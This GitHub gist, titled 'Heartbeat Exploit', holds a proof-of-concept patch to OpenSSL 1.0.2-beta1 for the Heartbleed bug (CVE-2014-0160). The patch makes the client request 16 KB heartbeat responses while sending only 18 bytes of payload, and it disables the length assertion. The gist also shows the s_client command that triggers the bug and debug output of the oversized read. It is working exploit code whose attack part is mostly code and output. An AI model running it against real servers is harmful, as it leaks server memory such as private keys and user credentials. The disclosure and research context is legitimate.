Created
April 9, 2014 16:03
-
-
Save alinefr/10286669 to your computer and use it in GitHub Desktop.
Heartbeat Exploit
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
The OpenSSL toolkit stays under a dual license, i.e. both the conditions of | |
the OpenSSL License and the original SSLeay license apply to the toolkit. | |
See below for the actual license texts. Actually both licenses are BSD-style | |
Open Source licenses. In case of any license issues related to OpenSSL | |
please contact [email protected]. | |
(c) Tim Brown, 2014 | |
<mailto:[email protected]> | |
<http://www.nth-dimension.org.uk/> / <http://www.machine.org.uk/> | |
PoC exploit for CVE-2014-0160. | |
If you apply this patch, you will then be able to trigger the bug | |
as follows: | |
$ apps/openssl s_client -debug -connect vulnerable:443 | |
... | |
Verify return code: 20 (unable to get local issuer certificate) | |
--- | |
client> B | |
HEARTBEATING | |
write to 0x1ba0270 [0x1ba9da3] (30 bytes => 30 (0x1E)) | |
0000 - 17 03 03 00 19 bb e6 52-26 20 74 c1 a7 99 fb da .......R& t..... | |
0010 - 1a 6b 20 cd 8e 33 17 bb-83 a1 9c 73 c6 d2 .k ..3.....s.. | |
write to 0x1ba0270 [0x1ba9da3] (66 bytes => 66 (0x42)) | |
0000 - 18 03 03 00 3d bb e6 52-26 20 74 c1 a8 f7 23 2c ....=..R& t...#, | |
0010 - 5a de d4 a3 e2 8d 14 e5-be a8 0c 66 2a 54 7d 13 Z..........f*T}. | |
0020 - 72 ef ba 33 a1 3c 83 6d-0a b9 96 32 7a d3 69 a2 r..3.<.m...2z.i. | |
read from 0x1ba0270 [0x1ba5853] (5 bytes => 5 (0x5)) | |
0000 - 18 03 03 40 18 ...@. | |
read from 0x1ba0270 [0x1ba5858] (16408 bytes => 1371 (0x55B)) | |
... | |
Patch is below: | |
--- openssl-1.0.2-beta1/ssl/t1_lib.c 2014-02-24 12:36:16.000000000 +0000 | |
+++ openssl-1.0.2~beta1-patched/ssl/t1_lib.c 2014-04-08 10:02:06.819998579 +0100 | |
@@ -3797,6 +3797,7 @@ | |
/* Read type and payload length first */ | |
hbtype = *p++; | |
n2s(p, payload); | |
+ printf("asked for %i bytes\n", payload); | |
pl = p; | |
if (s->msg_callback) | |
@@ -3820,6 +3821,8 @@ | |
*bp++ = TLS1_HB_RESPONSE; | |
s2n(payload, bp); | |
memcpy(bp, pl, payload); | |
+ printf("copied %i bytes\n", payload); | |
+ printf("record was only %i bytes\n", s->s3->rrec.length); | |
bp += payload; | |
/* Random padding */ | |
RAND_pseudo_bytes(bp, padding); | |
@@ -3860,7 +3863,7 @@ | |
{ | |
unsigned char *buf, *p; | |
int ret; | |
- unsigned int payload = 18; /* Sequence number + random bytes */ | |
+ unsigned int payload = 0x4000; /* Sequence number + random bytes */ | |
unsigned int padding = 16; /* Use minimum padding */ | |
/* Only send if peer supports and accepts HB requests... */ | |
@@ -3888,7 +3891,7 @@ | |
/* Check if padding is too long, payload and padding | |
* must not exceed 2^14 - 3 = 16381 bytes in total. | |
*/ | |
- OPENSSL_assert(payload + padding <= 16381); | |
+ //OPENSSL_assert(payload + padding <= 16381); | |
/* Create HeartBeat message, we just use a sequence number | |
* as payload to distuingish different messages and add | |
@@ -3913,7 +3916,7 @@ | |
/* Random padding */ | |
RAND_pseudo_bytes(p, padding); | |
- ret = ssl3_write_bytes(s, TLS1_RT_HEARTBEAT, buf, 3 + payload + padding); | |
+ ret = ssl3_write_bytes(s, TLS1_RT_HEARTBEAT, buf, 3 + 18 + padding); | |
if (ret >= 0) | |
{ | |
if (s->msg_callback) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment